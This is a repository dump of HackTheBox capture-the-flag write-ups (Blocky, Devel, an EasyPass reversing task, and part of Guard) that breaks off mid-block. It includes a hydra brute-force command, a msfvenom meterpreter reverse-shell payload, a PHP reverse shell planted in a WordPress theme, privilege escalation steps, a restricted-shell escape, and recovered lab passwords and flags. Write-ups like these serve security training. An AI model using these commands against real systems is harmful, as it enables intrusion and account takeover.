17 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8=
18 | | 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
19 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj
20 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
21 | |_http-generator: WordPress 4.8
22 | | http-methods:
23 | |_ Supported Methods: GET HEAD POST OPTIONS
24 | |_http-server-header: Apache/2.4.18 (Ubuntu)
25 | |_http-title: BlockyCraft – Under Construction!
26 | 25565/tcp open minecraft syn-ack Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
27 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
28 | ```
29 |
30 | ## Examine Port 21 - FTP (???)
31 |
32 | On Port 21 we have a service running which seems to be FTP. However, nmap already marks it as "?", as it apparently is not FTP. To make sure, we use the ftp client and connect to the port:
33 |
34 | ```
35 | └──╼ $ ftp 10.129.1.53
36 | Connected to 10.129.1.53.
37 | ```
38 |
39 | After like 20 seconds without receiving any output, it shows us following:
40 |
41 | ```
42 | 220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.129.1.53]
43 | Name (10.129.1.53:ctf):
44 | ```
45 |
46 | This is already quite strange. But at this point I simply assumed it's some network issues. So I tried logging in as `Anonymous`, as this usually works on the most vulnerable systems, but it does not work here. As we do not have any further credentials that we could try, we have to skip FTP for now and proceed with the Apache Server.
47 |
48 | ## Examine Port 80 - Apache Server
49 |
50 | 
51 |
52 | On Port 80, we see some minecraft themed web application that was apparently developed with Wordpress (visible at the bottom of the website).
53 |
54 | By running gobuster, we can confirm, that this is indeed a Wordpress application, as it contains all common directories, such as wp-admin:
55 |
56 | ```
57 | └──╼ $ gobuster dir -u "10.129.1.53" -w /usr/share/wordlists/dirb/big.txt
58 | ===============================================================
59 | Gobuster v3.0.1
60 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
61 | ===============================================================
62 | [+] Url: http://10.129.1.53
63 | [+] Threads: 10
64 | [+] Wordlist: /usr/share/wordlists/dirb/big.txt
65 | [+] Status codes: 200,204,301,302,307,401,403
66 | [+] User Agent: gobuster/3.0.1
67 | [+] Timeout: 10s
68 | ===============================================================
69 | 2021/01/18 18:17:57 Starting gobuster
70 | ===============================================================
71 | /.htaccess (Status: 403)
72 | /.htpasswd (Status: 403)
73 | /javascript (Status: 301)
74 | /phpmyadmin (Status: 301)
75 | /plugins (Status: 301)
76 | /server-status (Status: 403)
77 | /wiki (Status: 301)
78 | /wp-admin (Status: 301)
79 | /wp-content (Status: 301)
80 | /wp-includes (Status: 301)
81 | ```
82 |
83 | But it also contains some other directories such as `/wiki` and `/plugins`. We will check them out later. For now we just click through the pages and search for useful information. One of the recent posts contains was posted by `Notch`. Maybe this is a valid username for the wp-admin login. Let's try it.
84 |
85 | 
86 |
87 | And indeed! It exists. Let's see if Notch has a weak password.
88 |
89 | For that, we first have to intercept the login POST request with Burpsuite, to see the required parameters:
90 |
91 | ```
92 | log=notch&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.129.1.53%2Fwp-admin%2F&testcookie=1
93 | ```
94 |
95 | Now we can use a tool like hydra to bruteforce the password of Notch:
96 |
97 | ```
98 | hydra -l notch -P /usr/share/wordlists/rockyou.txt 10.129.1.53 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.129.1.53%2Fwp-admin%2F&testcookie=1:F=incorrect" -vvv -f
99 | ```
100 |
101 | However, this led to nothing. Apparently, the password of notch is quite strong and probably not the intended way how to pwn the machine.
102 |
103 | Let's see what's in the other directories.
104 |
105 | In wiki we only see a "Under construction message":
106 |
107 | ```
108 | Under Construction
109 |
110 | Please check back later! We will start publishing wiki articles after we have finished the main server plugin!
111 |
112 | The new core plugin will store your playtime and other information in our database, so you can see your own stats!
113 | ```
114 |
115 | But we should probably check out the plugins, as the wiki is hinting towards it.
116 |
117 | 
118 |
119 | Here we can see 2 jar files `BlockCore.jar` and `griefprevention...jar`. Let's download them to our local machine and inspect them.
120 |
121 | Jar files can be "unpacked" by running following command
122 | ```
123 | jar -xf BlockyCore.jar
124 | ```
125 | we receive the content of it, namely the directory `com`. Inside the directory, we find a class file `BlockyCore.class`. To inspect the java bytecode of it, we can run:
126 |
127 | ```
128 | javap -c BlockyCore
129 |
130 | Warning: File ./BlockyCore.class does not contain class BlockyCore
131 | Compiled from "BlockyCore.java"
132 | public class com.myfirstplugin.BlockyCore {
133 | public java.lang.String sqlHost;
134 |
135 | public java.lang.String sqlUser;
136 |
137 | public java.lang.String sqlPass;
138 |
139 | public com.myfirstplugin.BlockyCore();
140 | Code:
141 | 0: aload_0
142 | 1: invokespecial #12 // Method java/lang/Object."":()V
143 | 4: aload_0
144 | 5: ldc #14 // String localhost
145 | 7: putfield #16 // Field sqlHost:Ljava/lang/String;
146 | 10: aload_0
147 | 11: ldc #18 // String root
148 | 13: putfield #20 // Field sqlUser:Ljava/lang/String;
149 | 16: aload_0
150 | 17: ldc #22 // String 8YsqfCTnvxAUeduzjNSXe22
151 | 19: putfield #24 // Field sqlPass:Ljava/lang/String;
152 | 22: return
153 |
154 | public void onServerStart();
155 | Code:
156 | 0: return
157 |
158 | public void onServerStop();
159 | Code:
160 | 0: return
161 |
162 | public void onPlayerJoin();
163 | Code:
164 | 0: aload_0
165 | 1: ldc #33 // String TODO get username
166 | 3: ldc #35 // String Welcome to the BlockyCraft!!!!!!!
167 | 5: invokevirtual #37 // Method sendMessage:(Ljava/lang/String;Ljava/lang/String;)V
168 | 8: return
169 |
170 | public void sendMessage(java.lang.String, java.lang.String);
171 | Code:
172 | 0: return
173 | }
174 | ```
175 |
176 | It contains some quite interesting comments!
177 |
178 | ```
179 | // String root
180 | // Field sqlUser
181 |
182 | // String 8YsqfCTnvxAUeduzjNSXe22
183 | // Field sqlPass
184 | ```
185 |
186 | So apparently `root:8YsqfCTnvxAUeduzjNSXe22` are the credentials for the root SQL user. So how can we use it? During our enumeration, we found a `phpmyadmin` directory, in which we can probably use the credentials to access the databases!
187 |
188 | 
189 |
190 | And it works! We now have access to the databases.
191 |
192 | 
193 |
194 | Inspecting the database `wordpress` we see a table called `wp_users`.
195 |
196 | 
197 |
198 | It contains the password hash of the user notch: `$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/`
199 |
200 | Some research reveals that CMS like WordPress or Drupal use the portable PHP password hashing framework `phpass` (https://www.openwall.com/phpass/). We could try to bruteforce it, but as we are root, we can simply create our own hash of a known password and insert it into the database. For this, I used following website:
201 | http://scriptserver.mainframe8.com/wordpress_password_hasher.php
202 |
203 | Now we can login as Notch!
204 |
205 | 
206 |
207 | ## Gaining an Initial Foothold
208 |
209 | For obtaining a reverse shell we have several options. I've decided to inject a PHP reverse shell into the themes as following:
210 |
211 | 
212 |
213 | Now when loading this file by accessing it via the browser:
214 |
215 | ```
216 | http://10.129.1.53/wp-content/themes/twentyseventeen/404.php
217 | ```
218 |
219 | we receive a reverse shell!
220 |
221 | 
222 |
223 | ## Privilege Escalation
224 |
225 | We know that user `notch` exists. Let's examine his home directory.
226 |
227 | ```
228 | drwxrwxr-x 7 notch notch 4096 Jul 2 2017 minecraft
229 | -r-------- 1 notch notch 32 Jul 2 2017 user.txt
230 | ```
231 |
232 | Unforunately, we do not have enough permissions to read the user.txt. Also the investigation of the minecraft directory in the home directory led to nothing. After another hour of trying some stuff and being frustrated, I decided to try the SQL Root password as the password for notch, as he seems to be the only user on the system. Maybe he has used the same password for multiple services. And indeed. Huge facepalm at this moment.
233 |
234 | From here it's rather easy, as notch is on the sudoers list:
235 |
236 | ```
237 | notch@Blocky:/var/www$ sudo -l
238 | [sudo] password for notch:
239 | Matching Defaults entries for notch on Blocky:
240 | env_reset, mail_badpass,
241 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
242 |
243 | User notch may run the following commands on Blocky:
244 | (ALL : ALL) ALL
245 | ```
246 |
247 | So we simply run `sudo /bin/sh` or `su -` and we obtain the root shell!
248 |
249 | ```
250 | root@Blocky:~# id
251 | uid=0(root) gid=0(root) groups=0(root)
252 | ```
--------------------------------------------------------------------------------
/Blocky/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/logo.png
--------------------------------------------------------------------------------
/Blocky/pics/notch_credentials.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/notch_credentials.png
--------------------------------------------------------------------------------
/Blocky/pics/phpmyadmin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/phpmyadmin.png
--------------------------------------------------------------------------------
/Blocky/pics/phpmyadmin_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/phpmyadmin_login.png
--------------------------------------------------------------------------------
/Blocky/pics/plugin_editor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/plugin_editor.png
--------------------------------------------------------------------------------
/Blocky/pics/plugins.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/plugins.png
--------------------------------------------------------------------------------
/Blocky/pics/reverse_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/reverse_shell.png
--------------------------------------------------------------------------------
/Blocky/pics/themes_editor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/themes_editor.png
--------------------------------------------------------------------------------
/Blocky/pics/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/website.png
--------------------------------------------------------------------------------
/Blocky/pics/wordpress_feedback.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/wordpress_feedback.png
--------------------------------------------------------------------------------
/Blocky/pics/wp_admin_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Blocky/pics/wp_admin_login.png
--------------------------------------------------------------------------------
/Devel/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Devel (Windows)
4 |
5 | ## Enumeration
6 |
7 | ```
8 | rustscan 10.129.79.250 -- -Pn -sC -sV -o port_scan
9 |
10 | PORT STATE SERVICE REASON VERSION
11 | 21/tcp open ftp syn-ack Microsoft ftpd
12 | | ftp-anon: Anonymous FTP login allowed (FTP code 230)
13 | | 03-18-17 01:06AM aspnet_client
14 | | 03-17-17 04:37PM 689 iisstart.htm
15 | |_03-17-17 04:37PM 184946 welcome.png
16 | | ftp-syst:
17 | |_ SYST: Windows_NT
18 | 80/tcp open http syn-ack Microsoft IIS httpd 7.5
19 | | http-methods:
20 | | Supported Methods: OPTIONS TRACE GET HEAD POST
21 | |_ Potentially risky methods: TRACE
22 | |_http-server-header: Microsoft-IIS/7.5
23 | |_http-title: IIS7
24 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
25 | ```
26 |
27 | The machine has an open FTP port (which allows Anonymous login) as well as a webservice running on Port 80.
28 |
29 | ### Examine Port 21 - Anonymous FTP login
30 |
31 | ```
32 | ftp> dir
33 | 200 PORT command successful.
34 | 125 Data connection already open; Transfer starting.
35 | 03-18-17 01:06AM aspnet_client
36 | 03-17-17 04:37PM 689 iisstart.htm
37 | 03-17-17 04:37PM 184946 welcome.png
38 | 226 Transfer complete.
39 | ```
40 |
41 | We can follow the `aspnet_client` path until `"/aspnet_client/system_web/2_0_50727"`. However, there are no interesting files.
42 | Let's see what's on the webserver.
43 |
44 | ### Examine Port 80 - Microsoft IIS (Internet Information Service)
45 |
46 | 
47 |
48 | Inspecting the open Port 80, we only see a website containig a welcome picture. This is already very suspicious, as we have seen such a welcome png on the ftp server. Maybe they are even the same. Let's check if the directory `aspnet_client` exists.
49 |
50 | ```
51 | gobuster dir -u "http://10.129.79.250" -w /usr/share/wordlists/dirb/big.txt
52 |
53 | /aspnet_client (Status: 301)
54 | ```
55 |
56 | It does! So it seems like the FTP server contains all the files that are hosted on the webserver. Maybe we have write permissions to the directory, via the Anonymous FTP user. If so, we can upload a simple reverse shell script and access it via the browser.
57 |
58 | ## Exploitation
59 |
60 | As Windows server mostly support `ASP.NET`, I decided to upload a ASPX reverse shell. Credits to `borjmz` (https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx) for the aspx reverse shell code.
61 |
62 | With the FTP client I created a directory `test` in the root directory and uploaded the reverse shell ASPX file into it. Afterwards I accessed the file via the browser.
63 |
64 | 
65 |
66 | Now it's time for privilege escalation. This [github repository](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) lists many options about how to exploit the windows environment.
67 |
68 | However, none of them works. That's when I decided to switch to metasploit. Maybe it does offer us some ways.
69 |
70 | (At this point my machine crashed and I had to reset it. Therefore for the rest of the writeup it also has a new IP address: 10.129.80.0 instead of 10.129.79.250)
71 |
72 | First we have to create a meterpreter reverse shell. We can use msfvenom for that.
73 |
74 | ```
75 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.50 LPORT=4444 -a x86 -f aspx > shell.aspx
76 | ```
77 |
78 | Then we again upload this file via FTP.
79 |
80 | Before accessing the file via the browser, we first have to set up our metasploit listener:
81 |
82 | 
83 |
84 | Now run the listener and open the uploaded shell via the browser. You will receive a meterpreter session as result:
85 |
86 | 
87 |
88 | As we've already tested the user's privileges with the manual shell, we can skip this part and directly move to the privilege escalation part. We can use a metasploit module called `local_exploit_suggester`, to check which modules can be used to gain a system shell.
89 |
90 | Therefore, first put the current meterpreter session into the background and execute following:
91 |
92 | 
93 |
94 | It provides us with many exploit suggestions that we can try:
95 |
96 | 
97 |
98 | Let's try them:
99 |
100 | 1) exploit/windows/local/bypassuac_eventvwr: Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
101 | 2) exploit/windows/local/ms10_015_kitrap0d: Works!
102 | 
103 |
104 | Information about the exploit can be found here: https://www.exploit-db.com/exploits/11199. Apparently it's a pretty famous exploit and also very techincal. So enjoy the read.
105 |
106 | ## Post Exploitation
107 |
108 | User flag:
109 |
110 | ```
111 | c:\Users\babis\Desktop>type user.txt.txt
112 | type user.txt.txt
113 | 9ecdd6a3aedf24b41562fea70f4cb3e8
114 | ```
115 |
116 | Root flag:
117 |
118 | ```
119 | c:\Users\Administrator\Desktop>type root.txt.txt
120 | type root.txt.txt
121 | e621a0b5041708797c4fc4728bc72b4b
122 | ```
--------------------------------------------------------------------------------
/Devel/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/logo.png
--------------------------------------------------------------------------------
/Devel/pics/metasploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/metasploit.png
--------------------------------------------------------------------------------
/Devel/pics/meterpreter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/meterpreter.png
--------------------------------------------------------------------------------
/Devel/pics/privilege_escalation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/privilege_escalation.png
--------------------------------------------------------------------------------
/Devel/pics/reverse_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/reverse_shell.png
--------------------------------------------------------------------------------
/Devel/pics/suggester.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/suggester.png
--------------------------------------------------------------------------------
/Devel/pics/system_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/system_shell.png
--------------------------------------------------------------------------------
/Devel/pics/welcome.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Devel/pics/welcome.png
--------------------------------------------------------------------------------
/Doctor/pics/admin_post.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/admin_post.png
--------------------------------------------------------------------------------
/Doctor/pics/colorlib.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/colorlib.png
--------------------------------------------------------------------------------
/Doctor/pics/logged_in.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/logged_in.png
--------------------------------------------------------------------------------
/Doctor/pics/login_page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/login_page.png
--------------------------------------------------------------------------------
/Doctor/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/logo.png
--------------------------------------------------------------------------------
/Doctor/pics/posts_test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/posts_test.png
--------------------------------------------------------------------------------
/Doctor/pics/root_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/root_shell.png
--------------------------------------------------------------------------------
/Doctor/pics/splunk.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/splunk.png
--------------------------------------------------------------------------------
/Doctor/pics/splunk_loggedin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/splunk_loggedin.png
--------------------------------------------------------------------------------
/Doctor/pics/ssti_identifcation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/ssti_identifcation.png
--------------------------------------------------------------------------------
/Doctor/pics/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Doctor/pics/website.png
--------------------------------------------------------------------------------
/FindTheEasyPass/README.md:
--------------------------------------------------------------------------------
1 | # Beginner Track - Find The Easy pass
2 |
3 | Description:
4 |
5 | Find the password (say PASS) and enter the flag in the form HTB{PASS}
6 |
7 | The first step is to download the zip and unzip it (password: hackthebox). It reveals an executeable called `EasyPass.exe`. To run it you either use a Windows system or use Wine in Linux.
8 |
9 | 
10 |
11 | If we enter a password like `test` and press the `Check Password` button, we are notified that our password is wrong.
12 |
13 | 
14 |
15 | Now that we got some information, we can open a debugger/disassembler to analyze the code. You got several options for that (IDA, Immunity, Ollydbg, Ghidra). Choose the one that you like most. I chose IDA for this task.
16 |
17 | If you open the executable with IDA you should see something like this:
18 |
19 | 
20 |
21 | As we already know that we are prompted with a "Wrong password" message, once we enter a wrong password, we can search for this specifc string.
22 |
23 | 
24 |
25 | If you are familiar with Assembly, then you should directly see what's happening. Let's take a look at the graph, so that everybody sees it.
26 |
27 | 
28 |
29 | So what's happening is following:
30 |
31 | `CALL sub_404628` (the second line from the bottom in the upper rectangle), calls a function `sub_404628`. We currently don't know what this functions does, but the outcome of it decides whether we get a "Congratulations! Good Job" message or the "Wrong Password" one (`jnz` = Jump if not zero to the "Wrong Password" part, else continue to "Good Job").
32 |
33 | Let's take a look at the function.
34 |
35 | 
36 |
37 | It's basically just comparing two values (EAX and EDX). Depending on their equality, we get a zero flag or not.
38 |
39 | Let's set a breakpoint at the `CALL sub_404628` of the "main graph" and run the program. We can then investigate which values are in those two registers. (Shortcuts: F2 = breakpoint, F9 = start the program)
40 |
41 | Once reaching that breakpoint (I entered the password `test`), we can take a look at the General Registers, especially RAX and RDX.
42 |
43 | 
44 |
45 | Let's print the content of those registers (you can also simply hover over the registers to see the values)
46 |
47 | 
48 |
49 | Our input `test` is compared to `fortran!`. Based on this comparison, we receive either the `Good Job` or `Wrong Password` message. So `fortran!` must be the correct password then.
50 |
51 | To verify this, we can start the program again and insert `fortran!` as the password.
52 |
53 | 
54 |
55 | There we go, we got the correct password!
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/easypassexe.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/easypassexe.png
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/gj.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/gj.png
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/graph.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/graph.png
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/ida.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/ida.png
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/location.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/location.png
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/passwordcompare.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/passwordcompare.png
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/passwordfunction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/passwordfunction.png
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/registers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/registers.png
--------------------------------------------------------------------------------
/FindTheEasyPass/pics/wrongpassword.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/FindTheEasyPass/pics/wrongpassword.png
--------------------------------------------------------------------------------
/Guard/README.md:
--------------------------------------------------------------------------------
1 | # Starting Point - Guard
2 |
3 | ## Enumeration
4 |
5 | ```
6 | rustscan 10.10.10.50 -- -sC -sV -o port_scans
7 |
8 | PORT STATE SERVICE REASON VERSION
9 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10 | | ssh-hostkey:
11 | | 2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
12 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkcOfIguCL3HiluPAL9xLs0SKg0qvvnkO6iBLb/l9rmrN2ECvvce+E8S2gyZdm4pcgOBWfCYrwVPLxvc8nvpPZPSZ1LGfW5eoGwHdklIGAMgD0QtcphvoUuYowb+ZKNoXgq3Cj3EBP49HYHuHdYTQrWkzIJxKcOKQhX6Z4ayJxVL4jwUMKSVmn9kil5LvB4rrQNA4nnhF5F2LgCLBc/3clgwf+gPep6OLq0xuIf5S0bUTKZ/1Okg6dOxcIc2P3SRYxYyhfr8lP8g4/fid2seamTv9rmE3ilQq0iBj4fnVlY5jzI5m6EOGwdM84OiXsJZmHEPDwDcqmaMhYec1U953R
13 | | 256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
14 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMX3kqpY2ndXnsNY12RKRvy9tI69L4rrhFk1vims0B37Ju5YZ4Q5N+RV/ts7rvuKwUueCeH0AWEmE9oV3TsSG3k=
15 | | 256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
16 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9AJZ5v4FPferUM/c7u+T8W9N8zrGAjanwazh65aZnP
17 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
18 | ```
19 |
20 | Apparently, only the SSH port is open. As we have no other information given and previous machines have shown, that information from other machines must be re-used, we can try to connect as daniel (as we have his private ssh key).
21 |
22 | And it works! We are user `daniel`
23 |
24 | ```
25 | daniel@guard:~$ id
26 | uid=1000(daniel) gid=1000(picasso) groups=1000(picasso),27(sudo)
27 | ```
28 |
29 | ## Exploitation
30 |
31 | Having access to Daniel's home directory, we can directly read the user flag. But hmmm ... somehow `cat` does not give any output. It seems like we have some restrictions. However, `more` works perfectly fine. User flag: `209333652507f89d0d3a41ff4070c081`
32 |
33 |
34 | Let's look for some privilege escalation!
35 |
36 | We start by searching for files with SUID bit set:
37 |
38 | ```
39 | daniel@guard:~$ find / -perm -u=s -type f 2>/dev/null
40 | -rbash: /dev/null: restricted: cannot redirect output
41 | ```
42 |
43 | Weird! Something strange is happening with our shell. Let's investigate that.
44 |
45 | Looking at the `/etc/passwd` file, we can see that our current user has `rbash` as default shell.
46 |
47 | ```
48 | daniel:x:1000:1000:picasso:/home/picasso:/bin/rbash
49 | ```
50 |
51 | As I've personally never heard of it, I must first understand what this is and do some research.
52 |
53 | ```
54 | RBASH(1) General Commands Manual RBASH(1)
55 |
56 | NAME
57 | rbash - restricted bash, see bash(1)
58 |
59 | RESTRICTED SHELL
60 | If bash is started with the name rbash, or the -r option is supplied at invocation, the shell becomes restricted. A restricted shell is used to set up an environment
61 | more controlled than the standard shell. It behaves identically to bash with the exception that the following are disallowed or not performed:
62 |
63 | · changing directories with cd
64 |
65 | · setting or unsetting the values of SHELL, PATH, ENV, or BASH_ENV
66 |
67 | · specifying command names containing /
68 |
69 | · specifying a filename containing a / as an argument to the . builtin command
70 |
71 | · specifying a filename containing a slash as an argument to the -p option to the hash builtin command
72 |
73 | · importing function definitions from the shell environment at startup
74 |
75 | · parsing the value of SHELLOPTS from the shell environment at startup
76 |
77 | · redirecting output using the >, >|, <>, >&, &>, and >> redirection operators
78 |
79 | · using the exec builtin command to replace the shell with another command
80 |
81 | · adding or deleting builtin commands with the -f and -d options to the enable builtin command
82 |
83 | · using the enable builtin command to enable disabled shell builtins
84 |
85 | · specifying the -p option to the command builtin command
86 |
87 | · turning off restricted mode with set +r or set +o restricted.
88 |
89 | These restrictions are enforced after any startup files are read.
90 |
91 | When a command that is found to be a shell script is executed, rbash turns off any restrictions in the shell spawned to execute the script
92 | ```
93 |
94 | Apparently, that is some kind of restricted shell, that's highly limiting our functionalities.
95 |
96 | However, it does not prevent us from spawning a bash shell from within another program. I first tried it from within vim/vi, but it's disabled. Then I remembered a cool trick from the [OverTheWire Bandit](https://overthewire.org/wargames/bandit/) Wargame. If you manage to make your terminal as small as possible and open anything with `more`, then you get following:
97 |
98 | 
99 |
100 | From here, you can execute commands as such:
101 |
102 | 
103 |
104 | And now we've escaped the rbash environment!
105 |
106 | ```
107 | daniel@guard:~$ cd ..
108 | daniel@guard:/home$ pwd
109 | /home
110 | daniel@guard:/home$
111 | ```
112 |
113 | (The official writeup does it with the `man man` trick and spawns the bash from within there)
114 |
115 | Enumerating the system, I found some interesting backups in the `/backups` directory, namely a backup of the shadow file, for which we have read permissions.
116 |
117 | ```
